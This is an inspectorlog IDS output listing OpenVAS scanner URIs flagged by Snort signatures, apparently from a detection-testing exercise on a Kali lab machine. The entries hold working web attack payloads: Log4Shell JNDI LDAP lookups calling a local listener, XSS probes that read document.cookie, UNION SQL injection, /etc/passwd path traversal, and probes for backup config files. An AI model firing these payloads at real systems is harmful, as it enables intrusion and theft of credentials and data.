# inspectorlog v3.5
#----- Initializing Rules (SNORT) ---------------------
# Rules directory : "/home/kali/Downloads/reglas_javi/snort"
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-sn-20220324.rules... done
#		Rules: read [3749], erroneous [0], URI [384]
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-er-20220224.rules... done
[parse_snortRule] WARNING: Line [4970] exceeds allowed number of PCRE fields
#		Rules: read [6015], erroneous [0], URI [5116]
#----- Statistics (SNORT) ------------------------------
# Read [9764] Snort rules, [5500] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l openvas.uri -r /home/kali/Downloads/reglas_javi/snort -t list -o snort/openvas.clean
Packet [967]	Uri [/~1/]	Nattacks [1]	Signatures	[2015023]
Packet [1207]	Uri [/admin-console/]	Nattacks [1]	Signatures	[21517]
Packet [1208]	Uri [/web-console/]	Nattacks [1]	Signatures	[24342]
Packet [1209]	Uri [/web-console/Invoker/]	Nattacks [1]	Signatures	[24342]
Packet [1210]	Uri [/jmx-console/]	Nattacks [1]	Signatures	[21516]
Packet [1211]	Uri [/jmx-console/HtmlAdaptor/]	Nattacks [1]	Signatures	[21516]
Packet [1213]	Uri [/invoker/JMXInvokerServlet/]	Nattacks [2]	Signatures	[24343]	[2015747]
Packet [1336]	Uri [/CFIDE/administrator/]	Nattacks [2]	Signatures	[25975]	[2016184]
Packet [1337]	Uri [/CFIDE/administrator/settings/]	Nattacks [2]	Signatures	[25975]	[2016184]
Packet [1338]	Uri [/CFIDE/administrator/help/]	Nattacks [2]	Signatures	[25975]	[2016184]
Packet [1339]	Uri [/CFIDE/adminapi/]	Nattacks [2]	Signatures	[25976]	[2016183]
Packet [2048]	Uri [/phpinfo.php]	Nattacks [1]	Signatures	[2019526]
Packet [2081]	Uri [/cgi-bin/phpinfo.php]	Nattacks [1]	Signatures	[2019526]
Packet [2111]	Uri [/web/phpinfo.php]	Nattacks [1]	Signatures	[2019526]
Packet [2780]	Uri [/CFIDE/administrator/index.cfm]	Nattacks [2]	Signatures	[25975]	[2016184]
Packet [3083]	Uri [/CFIDE/administrator/index.cfm]	Nattacks [2]	Signatures	[25975]	[2016184]
Packet [3230]	Uri [/Info.live.htm]	Nattacks [1]	Signatures	[2012116]
Packet [5249]	Uri [/Web/SA2/ScriptList.do?gui_pagenotableData=><script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [5260]	Uri [/${jndi:ldap://192.168.133.137:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [5261]	Uri [/foo.jsp?param=<SCRIPT>foo</SCRIPT>.jsp]	Nattacks [1]	Signatures	[2009714]
Packet [5262]	Uri [/foo.shtml?param=<SCRIPT>foo</SCRIPT>.shtml]	Nattacks [1]	Signatures	[2009714]
Packet [5263]	Uri [/foo.thtml?param=<SCRIPT>foo</SCRIPT>.thtml]	Nattacks [1]	Signatures	[2009714]
Packet [5264]	Uri [/foo.cfm?param=<SCRIPT>foo</SCRIPT>.cfm]	Nattacks [1]	Signatures	[2009714]
Packet [5265]	Uri [/foo.php?param=<SCRIPT>foo</SCRIPT>.php]	Nattacks [1]	Signatures	[2009714]
Packet [5266]	Uri [/${jndi:ldap://kali:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [5267]	Uri [/<SCRIPT>foo</SCRIPT>]	Nattacks [1]	Signatures	[2009714]
Packet [5268]	Uri [/foo.jsp?param=<SCRIPT>foo</SCRIPT>]	Nattacks [1]	Signatures	[2009714]
Packet [5269]	Uri [/foo.shtml?param=<SCRIPT>foo</SCRIPT>]	Nattacks [1]	Signatures	[2009714]
Packet [5270]	Uri [/foo.thtml?param=<SCRIPT>foo</SCRIPT>]	Nattacks [1]	Signatures	[2009714]
Packet [5271]	Uri [/foo.cfm?param=<SCRIPT>foo</SCRIPT>]	Nattacks [1]	Signatures	[2009714]
Packet [5272]	Uri [/foo.php?param=<SCRIPT>foo</SCRIPT>]	Nattacks [1]	Signatures	[2009714]
Packet [5282]	Uri [/${jndi:ldap://127.0.0.1#192.168.133.137:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [5283]	Uri [/${jndi:ldap://127.0.0.1#kali:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [5284]	Uri [/${jndi:ldap://localhost#192.168.133.137:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [5285]	Uri [/${jndi:ldap://localhost#kali:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [5286]	Uri [/?param=${jndi:ldap://192.168.133.137:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [5292]	Uri [/servlet/one2planet.infolet.InfoServlet?page=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [5293]	Uri [/cgi-bin/servlet/one2planet.infolet.InfoServlet?page=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [5294]	Uri [/web/servlet/one2planet.infolet.InfoServlet?page=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [5300]	Uri [/?param=${jndi:ldap://kali:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [5303]	Uri [/admin/index.php?eventid=-1+union+all+select+1,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6--]	Nattacks [1]	Signatures	[2006446]
Packet [5304]	Uri [/calendar/admin/index.php?eventid=-1+union+all+select+1,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6--]	Nattacks [1]	Signatures	[2006446]
Packet [5305]	Uri [/cgi-bin/admin/index.php?eventid=-1+union+all+select+1,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6--]	Nattacks [1]	Signatures	[2006446]
Packet [5306]	Uri [/web/admin/index.php?eventid=-1+union+all+select+1,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6--]	Nattacks [1]	Signatures	[2006446]
Packet [5335]	Uri [/?param=${jndi:ldap://127.0.0.1#192.168.133.137:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [5346]	Uri [/news.php?wgo=666+and+1=2+union+all+select+0,1,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7,8--]	Nattacks [1]	Signatures	[2006446]
Packet [5347]	Uri [/cgi-bin/news.php?wgo=666+and+1=2+union+all+select+0,1,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7,8--]	Nattacks [1]	Signatures	[2006446]
Packet [5348]	Uri [/web/news.php?wgo=666+and+1=2+union+all+select+0,1,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7,8--]	Nattacks [1]	Signatures	[2006446]
Packet [5352]	Uri [/?param=${jndi:ldap://127.0.0.1#kali:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [5372]	Uri [/store/agora.cgi?cart_id=<SCRIPT>alert(document.domain)</SCRIPT>&xm=on&product=HTML]	Nattacks [1]	Signatures	[2009714]
Packet [5381]	Uri [/?param=${jndi:ldap://localhost#192.168.133.137:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [5393]	Uri [/login/login.php?sessID=<script>alert(/openvasvt/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [5394]	Uri [/cgi-bin/login/login.php?sessID=<script>alert(/openvasvt/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [5395]	Uri [/web/login/login.php?sessID=<script>alert(/openvasvt/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [5396]	Uri [/?param=${jndi:ldap://localhost#kali:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [5502]	Uri [/axdcms/modules/profile/user.php?aXconf[default_language]=../../../../../../../../../../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2012186]
Packet [5503]	Uri [/cms/modules/profile/user.php?aXconf[default_language]=../../../../../../../../../../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2012186]
Packet [5504]	Uri [/modules/profile/user.php?aXconf[default_language]=../../../../../../../../../../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2012186]
Packet [5505]	Uri [/cgi-bin/modules/profile/user.php?aXconf[default_language]=../../../../../../../../../../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2012186]
Packet [5506]	Uri [/web/modules/profile/user.php?aXconf[default_language]=../../../../../../../../../../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2012186]
Packet [5508]	Uri [/forum_2.php?msg=10&return=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [5510]	Uri [/cgi-bin/forum_2.php?msg=10&return=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [5511]	Uri [/web/forum_2.php?msg=10&return=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [5536]	Uri [/index.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5537]	Uri [/.index.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5559]	Uri [/wp-config.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5560]	Uri [/.wp-config.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5582]	Uri [/configuration.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5583]	Uri [/.configuration.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5605]	Uri [/config.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5606]	Uri [/.config.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5628]	Uri [/config.inc.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5629]	Uri [/.config.inc.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5650]	Uri [/settings.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5651]	Uri [/.settings.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5673]	Uri [/cgi-bin/index.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5674]	Uri [/cgi-bin/.index.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5696]	Uri [/cgi-bin/wp-config.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5697]	Uri [/cgi-bin/.wp-config.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5718]	Uri [/cgi-bin/configuration.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5719]	Uri [/cgi-bin/.configuration.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5741]	Uri [/cgi-bin/config.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5742]	Uri [/cgi-bin/.config.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5763]	Uri [/cgi-bin/config.inc.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5764]	Uri [/cgi-bin/.config.inc.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5786]	Uri [/cgi-bin/settings.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5787]	Uri [/cgi-bin/.settings.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5808]	Uri [/web/index.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5809]	Uri [/web/.index.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5832]	Uri [/web/wp-config.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5833]	Uri [/web/.wp-config.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5855]	Uri [/web/configuration.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5856]	Uri [/web/.configuration.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5877]	Uri [/web/config.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5878]	Uri [/web/.config.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5900]	Uri [/web/config.inc.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5901]	Uri [/web/.config.inc.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5923]	Uri [/web/settings.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5924]	Uri [/web/.settings.php~]	Nattacks [1]	Signatures	[2009955]
Packet [5989]	Uri [/modules/Submit/index.php?op=pre&title=<script>window.alert(document.cookie);</script>]	Nattacks [1]	Signatures	[2009714]
Packet [5990]	Uri [/cgi-bin/modules/Submit/index.php?op=pre&title=<script>window.alert(document.cookie);</script>]	Nattacks [1]	Signatures	[2009714]
Packet [5991]	Uri [/web/modules/Submit/index.php?op=pre&title=<script>window.alert(document.cookie);</script>]	Nattacks [1]	Signatures	[2009714]
Packet [5992]	Uri [/phplinkadmin/edlink.php?linkid=-1%27%20union%20all%20select%201,2,3,4,0x53514c2d496e6a656374696f6e2d54657374%27--]	Nattacks [3]	Signatures	[19438]	[2006446]	[2009365]
Packet [5993]	Uri [/edlink.php?linkid=-1%27%20union%20all%20select%201,2,3,4,0x53514c2d496e6a656374696f6e2d54657374%27--]	Nattacks [3]	Signatures	[19438]	[2006446]	[2009365]
Packet [5995]	Uri [/cgi-bin/edlink.php?linkid=-1%27%20union%20all%20select%201,2,3,4,0x53514c2d496e6a656374696f6e2d54657374%27--]	Nattacks [3]	Signatures	[19438]	[2006446]	[2009365]
Packet [5996]	Uri [/web/edlink.php?linkid=-1%27%20union%20all%20select%201,2,3,4,0x53514c2d496e6a656374696f6e2d54657374%27--]	Nattacks [3]	Signatures	[19438]	[2006446]	[2009365]
Packet [6015]	Uri [/blog/comment.php?id=-1%27%20UNION%20ALL%20SELECT%20NULL,0x53514c2d496e6a656374696f6e2d54657374,3,4%20FROM%20cblog_users%23]	Nattacks [3]	Signatures	[2006445]	[2006446]	[2010963]
Packet [6016]	Uri [/cbblog/comment.php?id=-1%27%20UNION%20ALL%20SELECT%20NULL,0x53514c2d496e6a656374696f6e2d54657374,3,4%20FROM%20cblog_users%23]	Nattacks [3]	Signatures	[2006445]	[2006446]	[2010963]
Packet [6017]	Uri [/blindblog/comment.php?id=-1%27%20UNION%20ALL%20SELECT%20NULL,0x53514c2d496e6a656374696f6e2d54657374,3,4%20FROM%20cblog_users%23]	Nattacks [3]	Signatures	[2006445]	[2006446]	[2010963]
Packet [6018]	Uri [/comment.php?id=-1%27%20UNION%20ALL%20SELECT%20NULL,0x53514c2d496e6a656374696f6e2d54657374,3,4%20FROM%20cblog_users%23]	Nattacks [3]	Signatures	[2006445]	[2006446]	[2010963]
Packet [6019]	Uri [/cgi-bin/comment.php?id=-1%27%20UNION%20ALL%20SELECT%20NULL,0x53514c2d496e6a656374696f6e2d54657374,3,4%20FROM%20cblog_users%23]	Nattacks [3]	Signatures	[2006445]	[2006446]	[2010963]
Packet [6020]	Uri [/web/comment.php?id=-1%27%20UNION%20ALL%20SELECT%20NULL,0x53514c2d496e6a656374696f6e2d54657374,3,4%20FROM%20cblog_users%23]	Nattacks [3]	Signatures	[2006445]	[2006446]	[2010963]
Packet [6021]	Uri [/blog/photo/templates/admin_default/confirm.tpl.php?nsextt="><script>alert(/openvasvt/);</script>]	Nattacks [2]	Signatures	[2009714]	[2013085]
Packet [6022]	Uri [/cms/photo/templates/admin_default/confirm.tpl.php?nsextt="><script>alert(/openvasvt/);</script>]	Nattacks [2]	Signatures	[2009714]	[2013085]
Packet [6023]	Uri [/photo/templates/admin_default/confirm.tpl.php?nsextt="><script>alert(/openvasvt/);</script>]	Nattacks [2]	Signatures	[2009714]	[2013085]
Packet [6024]	Uri [/cgi-bin/photo/templates/admin_default/confirm.tpl.php?nsextt="><script>alert(/openvasvt/);</script>]	Nattacks [2]	Signatures	[2009714]	[2013085]
Packet [6025]	Uri [/web/photo/templates/admin_default/confirm.tpl.php?nsextt="><script>alert(/openvasvt/);</script>]	Nattacks [2]	Signatures	[2009714]	[2013085]
Packet [6067]	Uri [/topic.php?filename=1%22%3e%3cscript%3ealert(%22%20%2b%20vtstrings%5b%22lowercase_rand%22%5d%20%2b%20%22)%3c%2fscript%3e]	Nattacks [1]	Signatures	[2009714]
Packet [6068]	Uri [/cgi-bin/topic.php?filename=1%22%3e%3cscript%3ealert(%22%20%2b%20vtstrings%5b%22lowercase_rand%22%5d%20%2b%20%22)%3c%2fscript%3e]	Nattacks [1]	Signatures	[2009714]
Packet [6069]	Uri [/web/topic.php?filename=1%22%3e%3cscript%3ealert(%22%20%2b%20vtstrings%5b%22lowercase_rand%22%5d%20%2b%20%22)%3c%2fscript%3e]	Nattacks [1]	Signatures	[2009714]
Packet [6075]	Uri [/add_url.htm?node=%3Cscript%3Ealert('XSS')%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [6077]	Uri [/cgi-bin/add_url.htm?node=%3Cscript%3Ealert('XSS')%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [6078]	Uri [/web/add_url.htm?node=%3Cscript%3Ealert('XSS')%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [6082]	Uri [/recipes/beerxml.php?r=null%20union%20select%201,2,3,4,5,0x53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11]	Nattacks [1]	Signatures	[2006446]
Packet [6083]	Uri [/recipedb/beerxml.php?r=null%20union%20select%201,2,3,4,5,0x53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11]	Nattacks [1]	Signatures	[2006446]
Packet [6084]	Uri [/brewthology/beerxml.php?r=null%20union%20select%201,2,3,4,5,0x53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11]	Nattacks [1]	Signatures	[2006446]
Packet [6085]	Uri [/beerxml.php?r=null%20union%20select%201,2,3,4,5,0x53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11]	Nattacks [1]	Signatures	[2006446]
Packet [6086]	Uri [/cgi-bin/beerxml.php?r=null%20union%20select%201,2,3,4,5,0x53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11]	Nattacks [1]	Signatures	[2006446]
Packet [6087]	Uri [/web/beerxml.php?r=null%20union%20select%201,2,3,4,5,0x53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11]	Nattacks [1]	Signatures	[2006446]
Packet [6100]	Uri [/organizer/view.php?id=-1+union+select+0x53514c2d496e6a656374696f6e2d54657374,2,3,4,5,6,7,8,9,10+from+test_category&mytable=test_category]	Nattacks [3]	Signatures	[2005015]	[2006445]	[2006446]
Packet [6101]	Uri [/view.php?id=-1+union+select+0x53514c2d496e6a656374696f6e2d54657374,2,3,4,5,6,7,8,9,10+from+test_category&mytable=test_category]	Nattacks [3]	Signatures	[2005015]	[2006445]	[2006446]
Packet [6102]	Uri [/cgi-bin/view.php?id=-1+union+select+0x53514c2d496e6a656374696f6e2d54657374,2,3,4,5,6,7,8,9,10+from+test_category&mytable=test_category]	Nattacks [3]	Signatures	[2005015]	[2006445]	[2006446]
Packet [6103]	Uri [/web/view.php?id=-1+union+select+0x53514c2d496e6a656374696f6e2d54657374,2,3,4,5,6,7,8,9,10+from+test_category&mytable=test_category]	Nattacks [3]	Signatures	[2005015]	[2006445]	[2006446]
Packet [6105]	Uri [/calendarexpress/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1]	Nattacks [1]	Signatures	[2009714]
Packet [6106]	Uri [/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1]	Nattacks [1]	Signatures	[2009714]
Packet [6107]	Uri [/cgi-bin/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1]	Nattacks [1]	Signatures	[2009714]
Packet [6108]	Uri [/web/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1]	Nattacks [1]	Signatures	[2009714]
Packet [6135]	Uri [/cgicso?query=<script>alert('foo')</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6136]	Uri [/cgi-bin/cgicso?query=<script>alert('foo')</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6137]	Uri [/web/cgicso?query=<script>alert('foo')</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6166]	Uri [/index.php?search=%3cscript%3ealert('openvasvt847900127')%3b%3c%2fscript%3e&function=search]	Nattacks [1]	Signatures	[2009714]
Packet [6167]	Uri [/cgi-bin/index.php?search=%3cscript%3ealert('openvasvt847900127')%3b%3c%2fscript%3e&function=search]	Nattacks [1]	Signatures	[2009714]
Packet [6168]	Uri [/web/index.php?search=%3cscript%3ealert('openvasvt847900127')%3b%3c%2fscript%3e&function=search]	Nattacks [1]	Signatures	[2009714]
Packet [6190]	Uri [/comic/news.php?news_id=4+union+all+select+0,1,2,0x53514c2d496e6a656374696f6e2d54657374]	Nattacks [1]	Signatures	[2006446]
Packet [6191]	Uri [/news.php?news_id=4+union+all+select+0,1,2,0x53514c2d496e6a656374696f6e2d54657374]	Nattacks [1]	Signatures	[2006446]
Packet [6192]	Uri [/cgi-bin/news.php?news_id=4+union+all+select+0,1,2,0x53514c2d496e6a656374696f6e2d54657374]	Nattacks [1]	Signatures	[2006446]
Packet [6193]	Uri [/web/news.php?news_id=4+union+all+select+0,1,2,0x53514c2d496e6a656374696f6e2d54657374]	Nattacks [1]	Signatures	[2006446]
Packet [6194]	Uri [/cms/view.php?article_id=-1%20UNION%20ALL%20SELECT%201,2,3,0x53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9]	Nattacks [2]	Signatures	[2006446]	[2009787]
Packet [6195]	Uri [/view.php?article_id=-1%20UNION%20ALL%20SELECT%201,2,3,0x53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9]	Nattacks [2]	Signatures	[2006446]	[2009787]
Packet [6196]	Uri [/cgi-bin/view.php?article_id=-1%20UNION%20ALL%20SELECT%201,2,3,0x53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9]	Nattacks [2]	Signatures	[2006446]	[2009787]
Packet [6197]	Uri [/web/view.php?article_id=-1%20UNION%20ALL%20SELECT%201,2,3,0x53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9]	Nattacks [2]	Signatures	[2006446]	[2009787]
Packet [6202]	Uri [/compactcms/afdrukken.php?page=%22%3E%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [6203]	Uri [/ccms/afdrukken.php?page=%22%3E%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [6204]	Uri [/cms/afdrukken.php?page=%22%3E%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [6206]	Uri [/afdrukken.php?page=%22%3E%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [6207]	Uri [/cgi-bin/afdrukken.php?page=%22%3E%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [6208]	Uri [/web/afdrukken.php?page=%22%3E%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [6209]	Uri [/comparisonengine/product.comparision.php?cat=null%20union%20all%20select%201,concat_ws(0x3a,0x4f,0x70,0x65,0x6e,0x56,0x41,0x53),3,4,5%20from%20daype_users_tb%20--&name=GSM]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [6210]	Uri [/compare/product.comparision.php?cat=null%20union%20all%20select%201,concat_ws(0x3a,0x4f,0x70,0x65,0x6e,0x56,0x41,0x53),3,4,5%20from%20daype_users_tb%20--&name=GSM]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [6211]	Uri [/product.comparision.php?cat=null%20union%20all%20select%201,concat_ws(0x3a,0x4f,0x70,0x65,0x6e,0x56,0x41,0x53),3,4,5%20from%20daype_users_tb%20--&name=GSM]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [6212]	Uri [/cgi-bin/product.comparision.php?cat=null%20union%20all%20select%201,concat_ws(0x3a,0x4f,0x70,0x65,0x6e,0x56,0x41,0x53),3,4,5%20from%20daype_users_tb%20--&name=GSM]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [6213]	Uri [/web/product.comparision.php?cat=null%20union%20all%20select%201,concat_ws(0x3a,0x4f,0x70,0x65,0x6e,0x56,0x41,0x53),3,4,5%20from%20daype_users_tb%20--&name=GSM]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [6238]	Uri [/cb/cultbooking.php?lang=../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2012336]
Packet [6239]	Uri [/cultbooking/cultbooking.php?lang=../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2012336]
Packet [6240]	Uri [/CultBooking/cultbooking.php?lang=../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2012336]
Packet [6241]	Uri [/cultbooking.php?lang=../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2012336]
Packet [6242]	Uri [/cgi-bin/cultbooking.php?lang=../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2012336]
Packet [6243]	Uri [/web/cultbooking.php?lang=../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2012336]
Packet [6263]	Uri [/calendar.php?year=2004&month=<script>foo</script>&day=01]	Nattacks [1]	Signatures	[2009714]
Packet [6264]	Uri [/cgi-bin/calendar.php?year=2004&month=<script>foo</script>&day=01]	Nattacks [1]	Signatures	[2009714]
Packet [6265]	Uri [/web/calendar.php?year=2004&month=<script>foo</script>&day=01]	Nattacks [1]	Signatures	[2009714]
Packet [6267]	Uri [/demium/urheber.php?name=../../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2009324]
Packet [6268]	Uri [/urheber.php?name=../../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2009324]
Packet [6269]	Uri [/cgi-bin/urheber.php?name=../../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2009324]
Packet [6270]	Uri [/web/urheber.php?name=../../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2009324]
Packet [6272]	Uri [/order.php?dhaction=check&submit_domain=Register&domain=<script>alert(document.cookie);</script>&ext1=on]	Nattacks [1]	Signatures	[2009714]
Packet [6273]	Uri [/cgi-bin/order.php?dhaction=check&submit_domain=Register&domain=<script>alert(document.cookie);</script>&ext1=on]	Nattacks [1]	Signatures	[2009714]
Packet [6274]	Uri [/web/order.php?dhaction=check&submit_domain=Register&domain=<script>alert(document.cookie);</script>&ext1=on]	Nattacks [1]	Signatures	[2009714]
Packet [6283]	Uri [/stuworkdisplay.php?ID=-1)%20UNION%20ALL%20SELECT%200x53514c2d496e6a656374696f6e2d54657374,2,3,4,5,6,7,8,9,10,11%23]	Nattacks [1]	Signatures	[2006446]
Packet [6284]	Uri [/DigitalScribe/stuworkdisplay.php?ID=-1)%20UNION%20ALL%20SELECT%200x53514c2d496e6a656374696f6e2d54657374,2,3,4,5,6,7,8,9,10,11%23]	Nattacks [1]	Signatures	[2006446]
Packet [6286]	Uri [/digitalscribe/stuworkdisplay.php?ID=-1)%20UNION%20ALL%20SELECT%200x53514c2d496e6a656374696f6e2d54657374,2,3,4,5,6,7,8,9,10,11%23]	Nattacks [1]	Signatures	[2006446]
Packet [6287]	Uri [/cgi-bin/stuworkdisplay.php?ID=-1)%20UNION%20ALL%20SELECT%200x53514c2d496e6a656374696f6e2d54657374,2,3,4,5,6,7,8,9,10,11%23]	Nattacks [1]	Signatures	[2006446]
Packet [6288]	Uri [/web/stuworkdisplay.php?ID=-1)%20UNION%20ALL%20SELECT%200x53514c2d496e6a656374696f6e2d54657374,2,3,4,5,6,7,8,9,10,11%23]	Nattacks [1]	Signatures	[2006446]
Packet [6301]	Uri [/dlguard/cart/index.php?page=1&c=&searchCart="><script>alert(/openvasvt/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6302]	Uri [/dlg/cart/index.php?page=1&c=&searchCart="><script>alert(/openvasvt/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6303]	Uri [/store/dlg/cart/index.php?page=1&c=&searchCart="><script>alert(/openvasvt/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6304]	Uri [/cbdm/cart/index.php?page=1&c=&searchCart="><script>alert(/openvasvt/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6305]	Uri [/index.php?page=1&c=&searchCart="><script>alert(/openvasvt/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6306]	Uri [/cgi-bin/index.php?page=1&c=&searchCart="><script>alert(/openvasvt/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6307]	Uri [/web/index.php?page=1&c=&searchCart="><script>alert(/openvasvt/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6374]	Uri [/news.php4?nid=-12'+union+select+1,2,0x53514c2d496e6a656374696f6e2d54657374,4,5,6,7,8,9,10,11/*]	Nattacks [1]	Signatures	[2006446]
Packet [6375]	Uri [/cgi-bin/news.php4?nid=-12'+union+select+1,2,0x53514c2d496e6a656374696f6e2d54657374,4,5,6,7,8,9,10,11/*]	Nattacks [1]	Signatures	[2006446]
Packet [6376]	Uri [/web/news.php4?nid=-12'+union+select+1,2,0x53514c2d496e6a656374696f6e2d54657374,4,5,6,7,8,9,10,11/*]	Nattacks [1]	Signatures	[2006446]
Packet [6397]	Uri [/escortservice/show_profile.php?custid=1+and+1=0+union+select+1,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66--+]	Nattacks [1]	Signatures	[2006446]
